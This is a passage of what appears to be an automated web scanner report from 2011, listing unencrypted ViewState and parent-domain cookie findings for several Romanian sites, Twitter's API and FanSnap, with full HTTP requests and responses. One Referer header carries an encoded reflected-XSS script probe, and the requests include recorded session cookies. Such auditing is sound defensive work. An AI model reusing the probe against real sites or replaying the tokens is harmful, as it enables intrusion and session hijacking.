User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:36:38 GMT
Content-Length: 61593


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODE0NzU5NDcxZGQ=" />
...[SNIP]...

12.3. http://umfcluj.ro/contact.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /contact.aspx

Request

GET /contact.aspx HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:10 GMT
Content-Length: 60428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwMTA5NjQ0MjAPZBYCZg9kFgICAg9kFgICCA9kFgJmD2QWBgIDDxYCHgdWaXNpYmxlaBYCAgcPZBYCAgMPEGRkFCsBAGQCBQ8WAh8AaBYCZg9kFgJmDxYEHglpbm5lcmh0bWxlHwBoZAIHDxYCHwEFGk5pbmNzIGPDrW16ZXR0IHbDoWxhc3p0dmEhZGQ=" />
...[SNIP]...

12.4. http://umfcluj.ro/en  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /en

Request

GET /en HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=RezidentiatPrezentare
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:10 GMT
Content-Length: 38709


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
...[SNIP]...

12.5. http://umfcluj.ro/fr  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /fr

Request

GET /fr HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Medicina-Prezentare
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:28:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:28:16 GMT
Content-Length: 38338


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
...[SNIP]...

12.6. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Request

GET /lista.aspx?t=Admitere-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:09 GMT
Content-Length: 81440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMjEzOTE2MTVkZA==" />
...[SNIP]...

12.7. http://umfcluj.ro/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /search.aspx

Request

GET /search.aspx?caut=xss HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/contact.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:33 GMT
Content-Length: 35912


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTAzMzY0NDY4N2Rk" />
...[SNIP]...

12.8. http://umfcluj.ro/sitemap.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /sitemap.aspx

Request

GET /sitemap.aspx HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:08 GMT
Content-Length: 104455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTgxNzg5Njg2MWRk" />
...[SNIP]...

12.9. http://www.cesal.ro/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cesal.ro
Path:   /

Request

GET / HTTP/1.1
Host: www.cesal.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/Portofoliu-Web-Design.html?6ac71%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E251e3ca71be=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:41:29 GMT
Content-Length: 17257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<title>Adeziv
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI1NjkxNjIxMmRk" />
...[SNIP]...

12.10. http://www.netlogiq.ro/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /

Request

GET / HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/search.aspx?caut=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:53 GMT
Content-Length: 18673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTgxMjAzNjcwZGQ=" />
...[SNIP]...

12.11. http://www.netlogiq.ro/Portofoliu-Web-Design.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /Portofoliu-Web-Design.html

Request

GET /Portofoliu-Web-Design.html HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:59 GMT
Content-Length: 223728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTEzMzQyMTQ2MWRk" />
...[SNIP]...

13. Cookie scoped to parent domain  previous  next
There are 150 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=93339674910801920&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=75691804 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1311018175028268; __utma=43838368.1598605414.1305368954.1311018185.1311089296.18; __utmb=43838368.1.10.1311089296; __utmc=43838368; __utmz=43838368.1311089296.18.11.utmcsr=microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/systemcenter/en/us/try-it.aspx; __utmv=43838368.lang%3A%20en; _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vbWljcm9zb2Z0%250AaGVscHM6D2NyZWF0ZWRfYXRsKwij4gJDMQE6B2lkIiU2ZGIzOGUyNjFlNjk2%250ANTY1YTdjYzMxZDhlNmM1OWY4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMY3NyZl9pZCIlMTEw%250AMGQzYWIzM2YyNjdhMzkwM2M5NTc0M2I0OTU3Mzk%253D--6855de8f8319199f3dbe9e47bcf8bfd4a45f5dc5; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:40:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1311090044-79048-4715
X-RateLimit-Limit: 1000
ETag: "1651d1dd1f63fbc93aeb6731a2f411c3"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 19 Jul 2011 15:40:44 GMT
X-RateLimit-Remaining: 893
X-Runtime: 0.04807
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114ac0fc3df
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8873dd7bf02da271f1dce1ede6bf8310c2861e18
X-RateLimit-Reset: 1311092891
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCKPiAkMxAToOcmV0dXJuX3RvIiZodHRwOi8v%250AdHdpdHRlci5jb20vbWljcm9zb2Z0aGVscHM6B2lkIiU2ZGIzOGUyNjFlNjk2%250ANTY1YTdjYzMxZDhlNmM1OWY4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMY3NyZl9pZCIlMTEw%250AMGQzYWIzM2YyNjdhMzkwM2M5NTc0M2I0OTU3Mzk%253D--3ed4f45079556305b186c9bf03a6a095afcf79ca; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 4544

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

13.2. http://bing.fansnap.com/checkout/ajax_verify_availability  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/ajax_verify_availability

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ajax_verify_availability?ticket_set_id=415814268&nolo=true&price=50&ch=bing&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&quantity=2 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DjJVKNBjoLb2Zmc2V0af6QnQ%3D%3D--2e47cba8174115434c5fd0ebde214f2fa1d5eacd

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 603
ETag: "bc79807f30db136aab5d82800c8267ef"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AE2XuNBjoLb2Zmc2V0af6QnQ%3D%3D--3b8ed313c2085f574bd844ee8fa643d5b8ec09dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 21
Connection: close
Content-Type: application/json; charset=utf-8

{"status":"CONTINUE"}

13.3. http://bing.fansnap.com/checkout/clickout/415814268  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/clickout/415814268

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/clickout/415814268?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5